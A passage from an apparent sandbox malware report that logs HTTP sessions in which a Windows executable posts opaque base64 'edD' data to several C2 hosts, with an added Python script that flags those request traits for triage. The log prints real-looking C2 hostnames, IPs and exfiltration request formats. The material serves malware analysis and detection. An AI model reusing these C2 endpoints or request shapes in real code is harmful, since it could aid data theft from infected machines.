                                                                                                                                Data Ascii: edD=mlNjiykzFjkbHtOR2R+Jk0D7hTcUohz8xcA8+YI9k7NVJrS48tDM3x2Y0TZuAuX7TIOIk6dmDPlb+njk+yngZF2LETZZSkE4E1eN8t2k4uVpAL0s3WFHQdeFYryaTvyGy1c6UNwXHLtPj/c+y6nR3mFhzzydedChqPZQh+ARfTf22H7lCMZoW2UJZsh/y/2wm7KPbGxcLEUKp/AQv+rwpKh5/lrHvZcSLUzQXksbPlx3z1TqcaocbF2i12pDRvfyXni16Cnl9UIhmd4qmbLL18jpeCanMDiHnY5gKsL+psjeembPYkKNhsM0FwdB1HgPTRX6xHjrCqladwCm+GLJackPRI9KcLa13tojVGelKgcs7iJPQakCzmcddPrdNBKk/Tcrxi9mCD2Wb3h2e8mK0l9ztzPiw2LQDHBwE+n97DFFXCJhM8FjBjnuvNbzWCt2j9VP7MkupFc1OQDTRA25tUG9znnfNnNrShIOZX366vE5ZO/R6rCSlxSNOJ7mDD2DHeIHEN1JwZBJ2oTBadlipw67xJwE4z6/HN6GMdDlrfck9MYakqFAOtWlip7saAEG1KNp162uYMAUUTdg2Dw/2uxfBFpT74hZXAixgwrp7Ki2UbteDexHQaNgLlKI5y6pjiG+9GiuixQIIaETQbCPHkIV4zRZc4h7aJs5vFseAmnkkfdmUZiycbaEMJ6dlKWKtZdcuI2c5QWNFS5olpqIwms9fBdjvBjPPsJajC5a5Pd9uwjsfYKpx3V4k7IqoxHmcuHJin/gq6bFIruWhwP1CgU8AeMuUGMRL5MyLQSR9LwM3CwE7uXQs1Tx4LFhONTGCXYtGZHQafSp3FP9tfzL0KyWWTVBXpjosMdcdeTkPs2P5z5iVVCKNIrYBVdC8uQn672k4d+GSmcPd24SvozoS0pJdWc0VU9hvalgE/gBhs2+k+IV+r0XPJ6eevJO9eAprFoFhQH5DXJFhF7d27xVs+mYLvrwN/aDxnEICNUFCjMxJRS+ [TRUNCATED]
                                                                                                                                 Oct 29, 2024 16:56:22.304447889 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:22 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 389
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                 36 | 192.168.2.8 | 49744 | 67.223.117.142 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 Oct 29, 2024 16:56:24.193042040 CET | 426 | OUT | GET /ak8m/?edD=rnlDhCsdJ2ooBNmRxWrIjnPAthAEmDTBnoEBgto8r48ZfNeG/PnUuRGB6UxkEvrVIavN7L12K9gGymeMzCPkQjaYFwN3T3JuEHWt+eu64/V1Op0q2QF2dqSePIe0BpSPtA==&mRR=Vxudf0fHzLw84n3P HTTP/1.1
                                                                                                                                Host: www.plyvik.info
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                 Oct 29, 2024 16:56:24.861367941 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:24 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 389
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


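Sessions 34 to 36 above share one request shape: a POST (or, in session 36, a GET) to a single short directory on the C2 host, form data that consists only of an opaque base64-like field named edD (plus mRR on the GET), Origin and Referer headers that point back at the request's own URL, an Android Chrome User-Agent sent by a Windows executable, and a 404 from the server every time. The Python below is an added triage example, not part of the Joe Sandbox report or of any FormBook tooling: it parses request text in the layout the report prints and reports those traits. The two request strings are copied from sessions 35 and 36 and the process path from the session table; the benign login request, its hostnames, values and browser path are constructed for comparison; the 16-character minimum for an opaque field and the four-character directory pattern are assumptions tuned to this capture, not documented FormBook constants.

```python
"""Triage heuristics for the HTTP sessions listed above.

Added example, not Joe Sandbox output. It parses a request in the layout the
report prints (request line, headers, blank line, body) and reports the
traits that the captured sessions share.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Values made only of the base64 alphabet with optional '=' padding.
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
# Assumption for this capture: a single four-character directory such as /ak8m/ or /2su7/.
SHORT_DIR_RE = re.compile(r"^/[a-z0-9]{4}/$")
MIN_OPAQUE_LEN = 16  # assumption: shorter values are treated as ordinary form data


@dataclass
class Request:
    method: str
    path: str
    query: str
    headers: dict
    body: str


def parse_request(raw: str) -> Request:
    """Split raw request text into request line, lower-cased headers and body."""
    head, _, body = raw.strip("\n").partition("\n\n")
    lines = head.splitlines()
    method, target, _version = lines[0].split(" ", 2)
    parts = urlsplit(target)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, parts.path, parts.query, headers, body.strip())


def split_form(encoded: str) -> dict:
    """Split k=v&k=v without percent-decoding, so '+' inside the payload survives."""
    params = {}
    for pair in encoded.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[key] = value
    return params


def triage(req: Request, process_path: str) -> list:
    """Return the suspicious traits found in one request (empty list if none)."""
    findings = []
    params = split_form(req.body if req.method == "POST" else req.query)
    opaque = [k for k, v in params.items()
              if len(v) >= MIN_OPAQUE_LEN and B64_RE.match(v)]
    if opaque and len(opaque) == len(params):
        findings.append(f"every form field is opaque base64-like data: {opaque}")
    host = req.headers.get("host", "")
    origin = req.headers.get("origin", "")
    referer = req.headers.get("referer", "")
    if origin and urlsplit(origin).netloc == host and referer == origin + req.path:
        findings.append("Origin and Referer point at the request's own URL")
    if SHORT_DIR_RE.match(req.path):
        findings.append(f"single short directory path {req.path}")
    ua = req.headers.get("user-agent", "")
    if "Android" in ua and process_path.lower().endswith(".exe"):
        findings.append("Android browser User-Agent sent by a Windows executable")
    return findings


# Process path from the session table above (PID 5072).
PROCESS = r"C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe"

# Session 35, copied from the capture above.
SESSION_35 = """POST /ak8m/ HTTP/1.1
Host: www.plyvik.info
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.plyvik.info
Referer: http://www.plyvik.info/ak8m/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 224
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36

edD=mlNjiykzFjkbHtOR2R+Jk0D7hTcUohz8xcA8+YI9k7FVKeO4+N/M2x2Y6zZzAuXcTJmMk6BQDNtb8Ebk8DngXF2LIzZYKEEXE1OJ8sGk4uVpANwsjTxHSdeGQLyOEfzTy1VNUNktG7NPifs+po/R4mFZjjzYedPmqO0vh+1KfRP2yTGyWPJILHsudqZ3+Nyq4K6pZFBoJRM5m/8oocWS+sIt4SrK
"""

# Session 36, copied from the capture above.
SESSION_36 = """GET /ak8m/?edD=rnlDhCsdJ2ooBNmRxWrIjnPAthAEmDTBnoEBgto8r48ZfNeG/PnUuRGB6UxkEvrVIavN7L12K9gGymeMzCPkQjaYFwN3T3JuEHWt+eu64/V1Op0q2QF2dqSePIe0BpSPtA==&mRR=Vxudf0fHzLw84n3P HTTP/1.1
Host: www.plyvik.info
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
"""

# Constructed benign login POST for comparison (hostname, values and process path invented).
BENIGN_PROCESS = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
BENIGN = """POST /login HTTP/1.1
Host: shop.example
Origin: https://shop.example
Referer: https://shop.example/account
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0 Safari/537.36

user=alice&password=hunter2&remember=on
"""

if __name__ == "__main__":
    for label, raw, proc in (("session 35", SESSION_35, PROCESS),
                             ("session 36", SESSION_36, PROCESS),
                             ("benign", BENIGN, BENIGN_PROCESS)):
        print(label, triage(parse_request(raw), proc))
```

Treat the findings as a triage aid rather than a verdict: the heuristics work on request shape because the edD value does not decode to readable text, and the 404 the server returns says nothing about whether the POST body was recorded on the other end.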
                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                 37 | 192.168.2.8 | 49745 | 107.163.130.253 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 Oct 29, 2024 16:56:30.667268038 CET | 669 | OUT | POST /2su7/ HTTP/1.1
                                                                                                                                Host: www.68529.xyz
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.68529.xyz
                                                                                                                                Referer: http://www.68529.xyz/2su7/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 204
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 6b 59 4f 51 64 59 34 4e 6d 39 4e 31 4a 37 77 67 31 2b 70 32 45 36 6f 50 58 43 78 2f 75 57 4d 67 73 64 71 62 74 6d 69 4e 7a 55 51 58 64 43 7a 58 2f 45 4b 62 31 77 57 6f 57 41 7a 4e 79 59 74 51 53 46 64 7a 67 74 42 57 45 31 46 51 39 45 2b 4a 56 67 38 32 61 53 70 2f 68 52 48 66 48 31 39 39 72 70 36 59 50 47 44 79 36 31 7a 67 4f 39 74 64 65 46 56 39 66 6b 71 6d 37 72 57 6b 75 74 54 58 7a 30 6b 32 65 37 50 46 79 6f 57 4a 47 33 63 33 68 6f 48 50 48 31 68 37 58 78 59 6b 56 4e 36 31 42 55 44 47 46 46 46 50 58 33 42 39 51 4f 6a 54 6e 52 7a 78 6e 4e 4b 70 52 32 53 47 67 48 54 61 57 36 56 30 67 77 77 3d
                                                                                                                                Data Ascii: edD=kYOQdY4Nm9N1J7wg1+p2E6oPXCx/uWMgsdqbtmiNzUQXdCzX/EKb1wWoWAzNyYtQSFdzgtBWE1FQ9E+JVg82aSp/hRHfH199rp6YPGDy61zgO9tdeFV9fkqm7rWkutTXz0k2e7PFyoWJG3c3hoHPH1h7XxYkVN61BUDGFFFPX3B9QOjTnRzxnNKpR2SGgHTaW6V0gww=
                                                                                                                                 Oct 29, 2024 16:56:31.587364912 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:31 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                 38 | 192.168.2.8 | 49746 | 107.163.130.253 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 Oct 29, 2024 16:56:33.223953962 CET | 689 | OUT | POST /2su7/ HTTP/1.1
                                                                                                                                Host: www.68529.xyz
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.68529.xyz
                                                                                                                                Referer: http://www.68529.xyz/2su7/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 224
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 6b 59 4f 51 64 59 34 4e 6d 39 4e 31 49 62 41 67 7a 5a 64 32 43 61 6f 4d 59 69 78 2f 67 32 4d 6b 73 64 6d 62 74 6b 50 57 7a 6d 30 58 64 6e 58 58 2b 41 57 62 32 77 57 6f 5a 67 79 6d 38 34 74 66 53 46 42 42 67 6f 70 57 45 31 35 51 39 47 32 4a 57 54 45 35 49 79 70 39 71 78 48 5a 4a 56 39 39 72 70 36 59 50 47 48 59 36 31 72 67 4f 50 35 64 52 45 56 2b 53 45 71 70 7a 4c 57 6b 71 74 54 54 7a 30 6c 54 65 2b 7a 2f 79 73 6d 4a 47 79 77 33 34 5a 48 4d 4f 31 68 35 54 78 5a 6d 57 66 72 41 47 31 48 41 4d 6d 52 51 54 57 63 46 63 59 53 35 39 7a 37 33 6b 4e 69 43 52 31 36 77 6c 77 4f 79 4d 5a 46 45 2b 6e 6d 37 49 5a 33 49 59 77 4f 4e 67 6c 55 7a 61 62 2f 49 56 61 64 6d
                                                                                                                                Data Ascii: edD=kYOQdY4Nm9N1IbAgzZd2CaoMYix/g2MksdmbtkPWzm0XdnXX+AWb2wWoZgym84tfSFBBgopWE15Q9G2JWTE5Iyp9qxHZJV99rp6YPGHY61rgOP5dREV+SEqpzLWkqtTTz0lTe+z/ysmJGyw34ZHMO1h5TxZmWfrAG1HAMmRQTWcFcYS59z73kNiCR16wlwOyMZFE+nm7IZ3IYwONglUzab/IVadm
                                                                                                                                Oct 29, 2024 16:56:34.132483006 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:33 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                39 | 192.168.2.8 | 49747 | 107.163.130.253 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Oct 29, 2024 16:56:36.359710932 CET | 1706 | OUT | POST /2su7/ HTTP/1.1
                                                                                                                                Host: www.68529.xyz
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.68529.xyz
                                                                                                                                Referer: http://www.68529.xyz/2su7/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Ascii: edD=[TRUNCATED]
                                                                                                                                Oct 29, 2024 16:56:37.280574083 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:37 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                40 | 192.168.2.8 | 49748 | 107.163.130.253 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Oct 29, 2024 16:56:38.902292967 CET | 424 | OUT | GET /2su7/?edD=pamwepkWr5FhGLIp9e9dE5wxTwNKoV0OitnUuyON/V0YdhH090qorkisWAKc74xRI1QLgpFLJyIK92bUXzceQHZBiR72PVsC64CKK1bLyHz9EtZqc0FSRzmTtcqhmMmMlg==&mRR=Vxudf0fHzLw84n3P HTTP/1.1
                                                                                                                                Host: www.68529.xyz
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Oct 29, 2024 16:56:39.833916903 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:39 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                41 | 192.168.2.8 | 49749 | 95.216.25.89 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Oct 29, 2024 16:56:45.198911905 CET | 678 | OUT | POST /taxt/ HTTP/1.1
                                                                                                                                Host: www.bulbulun.net
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.bulbulun.net
                                                                                                                                Referer: http://www.bulbulun.net/taxt/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 204
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Ascii: edD=m3gOYAyqk4IZsVY9WPl+HeVgYxJGcm0N/O+9xdw5wXYkMQL+lzs+m83VlMc0uliUo0pQpSKOCjfpFVZmJfMhCXq7FWt7nGRxqRbWgKyvNyrUDvE8dKDorRh6MNJ8a1PnCB46b1fRZrmK4NYm4eMGG/MsWXvLyz/m0DQt/TkC5XFP3Pd5spYg5czJeGV2qk0eh/V0qLU=
                                                                                                                                Oct 29, 2024 16:56:46.061676979 CET | 360 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:45 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 196
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                42 | 192.168.2.8 | 49750 | 95.216.25.89 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Oct 29, 2024 16:56:47.754036903 CET | 698 | OUT | POST /taxt/ HTTP/1.1
                                                                                                                                Host: www.bulbulun.net
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.bulbulun.net
                                                                                                                                Referer: http://www.bulbulun.net/taxt/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 224
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Ascii: edD=m3gOYAyqk4IZu2Q9QvZ+F+VjEBJGJW0J/O69xfcpwF8kMx7+0HY+n83V98c1jFifo0lYpXiOCgjpFQ1mJo4iCHq5Emt1omRxqRbWgK3IN2/UAf08co73hxh5JNJ8e1OuCB5XbxX/Zt6K4MIm4PMHP/MuJnu4zR3r3CEMhgg2nxJG25sT2LQm6cbieF9AvTp27cFE0cA18t7jSxqqEQPLbQvn46k9
                                                                                                                                Oct 29, 2024 16:56:48.637900114 CET | 360 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:48 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 196
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
